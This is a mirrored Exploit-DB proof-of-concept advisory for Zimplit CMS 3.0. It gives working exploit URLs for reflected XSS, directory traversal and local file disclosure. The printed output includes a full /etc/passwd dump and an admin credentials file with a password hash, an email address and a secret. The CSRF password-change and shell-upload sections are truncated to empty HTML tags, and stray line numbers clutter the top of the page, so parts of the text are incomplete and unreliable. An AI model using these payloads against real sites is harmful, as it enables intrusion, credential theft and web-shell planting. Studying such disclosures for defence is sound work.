Zimplit CMS 3.0 – Multiple Vulnerabilities

Exploit Database
110 阅读

作者： Yashar shahinzadeh

日期： 2013-09-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/28272/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

###################################################################################################################################

# Exploit Title: Zimplit CMS multiple vulnerabilities

# Date: 2013 13 September

# Exploit Author: Yashar shahinzadeh

# Special thanks to Mormoroth

# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir

# Vendor Homepage: www.zimplit.com

# Tested on: Linux & Windows, PHP 5.3.2

# Affected Version :3.0 (Last)

# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }

###################################################################################################################################

# Exploit-DB Note: Need to be authenticated for some of these to work

Summary:

========

1. XSS (Reflected)

2. CSRF / Directory traversal

3. CSRF / Local file disclosure

4. CSRF / Change administrator's password

5. CSRF / Upload a shell

6. CSRF / too much divastating actions to do

1. XSS (Reflected):

===================

CMS suffers from cross site scripting due to lack of user's input sanitization:

File: zimplit.php (line 535)

...

} else {

return 'Error: The file '.$file.' does not exist.';

}

...

Exploit:

http://192.168.0.106/zimplit/zimplit.php?action=load&file=[XSS]

http://192.168.0.106/zimplit/zimplit.php?action=load&file=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28944002%29%3C%2fScRiPt%3E

2. CSRF / Directory traversal:

==============================

The following URL provides files' lists to attacker. Although it requires authorized user such as admin, with an appropriate javascript exploit an attacker is capable of having administrator's view of vulnerable link:

http://192.168.0.106/zimplit/zimplit.php?action=listAllFiles&file=[Directory]

File: zimplit.php (line 772 through 792)

...

function listFilesDir($file) {

if($file == ''){ $thedir = '.';} else { $thedir= $file;}

if ($handle = opendir($thedir)) {

while (false !== ($file = readdir($handle))) {

if (is_dir($thedir.'/'.$file)) {

if($thedir != '.'){

$files[] = $file.'|dir';

} else {

if($file != '.' && $file != '..'){

$files[] = $file.'|dir';

}

} else {

$files[] = $file.'|file';

}

closedir($handle);

}

return implode(';', $files);

}

...

Example:

http://192.168.0.106/zimplit/zimplit.php?action=listAllFiles&file=../../../../

Results in:

3. CSRF / Local file disclosure:

================================

The CMS suffers from LFD, like example above appropriate exploitation would be very harmful:

File: zimplit.php (line 521 through 537)

...

function getHTML($file) {

if (is_file($file)) {

if (is_readable($file)) {

$content = file_get_contents($file);

if ($content === FALSE) {

return 'Error: Cannot read from the file '.$file.'.';

}

return $content;

} else {

return 'Error: The file '.$file.' is not readable.';

}

} else {

return 'Error: The file '.$file.' does not exist.';

}

...

Exploit:

http://192.168.0.106/zimplit/zimplit.php?action=load1&file=[Path to file]

Examples:

http://192.168.0.106/zimplit/zimplit.php?action=load1&file=../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

libuuid:x:100:101::/var/lib/libuuid:/bin/sh

syslog:x:101:103::/home/syslog:/bin/false

messagebus:x:102:107::/var/run/dbus:/bin/false

avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false

avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false

couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash

speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh

usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false

haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false

kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false

pulse:x:110:115:PulseAudio daemon,,,:/var/run/pulse:/bin/false

rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false

saned:x:112:118::/home/saned:/bin/false

hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false

gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false

yasho:x:1000:1000:Yasho,,,:/home/yasho:/bin/bash

vboxadd:x:999:1::/var/run/vboxadd:/bin/false

mysql:x:115:123:MySQL Server,,,:/var/lib/mysql:/bin/false

sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin

jetty:x:117:124::/usr/share/jetty:/bin/false

smmta:x:118:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false

smmsp:x:119:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false

Following exploit would lead to gathering administrator's username and password:

http://192.168.0.106/zimplit/zimplit.php?action=load1&file=security.php

<?php $u="yashar"; $p="dd0eaddc303999363896ceaad3458ecc"; $e="y.shahinzadeh@gmail.com"; $s="7xftg9by0nh97wso7pmd"; $r=""; ?>

4. CSRF / Change administrator's password:

==========================================

Following exploit results in changing administrator's credentials:

<html>

</form>

</html>

A random token would be a good prevention.

5. CSRF / Upload a shell

==========================================

Exploitation of this hole is semi complicated compared with previous ones, it has two steps must be taken separately. Firstly, a blank file must be created on the remote machine. Afterwards, the malisious contents are injected into it:

<html>

</form>

</html>

total 608

drwxrwxrwx7 yashoyasho4096 Sep 13 04:27 .

drwxr-xr-x 13 yashoyasho4096 Sep 13 02:45 ..

-rw-r--r--1 www-data www-data77873 Sep 13 02:14 58.zip

drwxrwxrwx2 www-data www-data 4096 Sep 13 02:14 Z-files

drwxrwxrwx2 www-data www-data 4096 Sep 13 02:14 Z-pictures

drwxrwxrwx2 yashoyasho4096 Sep 232009 Z-scripts

-rwxrwxrwx1 yashoyasho 845 Sep 222009 Zconfig.php

-rw-r--r--1 www-data www-data274 Sep 13 02:14 Zmenu.js

-rw-r--r--1 www-data www-data 86 Sep 13 02:14 Zsettings.js

drwxrwxrwx7 yashoyasho4096 Sep 232009 editor

drwxr-xr-x2 www-data www-data 4096 Sep 13 02:14 images

-rw-r--r--1 www-data www-data 5789 Sep 13 02:14 index.html

-rw-r--r--1 www-data www-data124 Sep 13 03:02 security.php

-rw-rw-rw-1 www-data www-data 28 Sep 13 04:27 shell.php

-rw-r--r--1 yashoyasho 7 Sep 13 02:16 test.txt

-rwxrwxrwx1 yashoyasho 37633 Sep 242009 zimplit.php

-rwxrwxrwx1 yashoyasho437955 Sep 13 00:58 zimplit_cms_3.0_standalone.zip

6. CSRF / too much divastating actions to do:

=============================================

I'm sure there will be more attacks, I just indicate some important ones.

/** Yasshar shahinzadeh **/